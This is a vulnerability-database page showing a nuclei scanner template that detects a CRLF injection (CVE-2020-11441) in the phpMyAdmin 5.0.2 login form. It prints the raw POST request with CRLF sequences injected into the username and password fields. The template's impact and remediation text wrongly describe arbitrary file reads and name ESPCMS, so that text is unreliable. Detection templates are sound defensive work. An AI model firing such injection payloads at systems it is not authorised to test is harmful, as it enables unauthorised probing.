Lucene search
K

phpMyAdmin 5.0.2 - CRLF Injection

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 87 Views

phpMyAdmin 5.0.2 CRLF Injection allows attackers to inject CRLF sequences via the login form

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
phpMyAdmin Injection Vulnerability
1 Apr 202000:00
cnvd
CVE
CVE-2020-11441
31 Mar 202016:50
cve
Cvelist
CVE-2020-11441
31 Mar 202016:50
cvelist
Debian CVE
CVE-2020-11441
31 Mar 202016:50
debiancve
NVD
CVE-2020-11441
31 Mar 202017:15
nvd
OSV
BIT-PHPMYADMIN-2020-11441
6 Mar 202411:02
osv
OSV
DEBIAN-CVE-2020-11441
31 Mar 202017:15
osv
OSV
UBUNTU-CVE-2020-11441
31 Mar 202017:15
osv
Prion
Crlf injection
31 Mar 202017:15
prion
Positive Technologies
PT-2020-12610 · Phpmyadmin +2 · Phpmyadmin +2
31 Mar 202000:00
ptsecurity
Rows per page
id: CVE-2020-11441

info:
  name: phpMyAdmin 5.0.2 - CRLF Injection
  author: ritikchaddha
  severity: medium
  description: |
    phpMyAdmin 5.0.2 allows CRLF injection, as demonstrated by %0D%0Astring%0D%0A inputs to login form fields causing CRLF sequences to be reflected on an error page. NOTE: the vendor states "I don't see anything specifically exploitable.
  impact: |
    Unauthenticated attackers can read arbitrary files from the server including configuration files and credentials, potentially leading to complete system compromise.
  remediation: |
    Upgrade to a patched version of the ESPCMS or apply vendor-provided security updates.
  reference:
    - https://github.com/phpmyadmin/phpmyadmin/issues/16056
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11441
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-11441
    cwe-id: CWE-93
    epss-score: 0.02312
    epss-percentile: 0.81324
    cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:5.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: phpmyadmin
    product: phpmyadmin
    shodan-query: title:"phpmyadmin"
    fofa-query: title="phpmyadmin"
  tags: cve,crlf,phpmyadmin,cve2020,vuln

http:
  - raw:
      - |
        GET /index.php?route=/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php?route=/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        set_session={{session}}&pma_username=%0D%0Atest:crlfinjection=1%0D%0A&pma_password=%0D%0Atest:crlfinjection=1%0D%0A&server=1&route=%2F&lang=en&token={{token}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "^test:crlfinjection=1$"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        name: session
        group: 1
        regex:
          - 'name="set_session" value="([a-z0-9]+)"'
        internal: true

      - type: regex
        part: body
        name: token
        group: 1
        regex:
          - 'name="token" value="([a-z0-9]+)"'
        internal: true
# digest: 4b0a004830460221008177ca71edd8f7ba1827157e0b7941ea720a3237bc8b13a7c54f1bc3f5a7974402210097770a2974845296156e2b6d2f719c5de98d41481f7e0af149a9b6ca8bc46cd1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24.3
CVSS 3.16.1
EPSS0.02312
87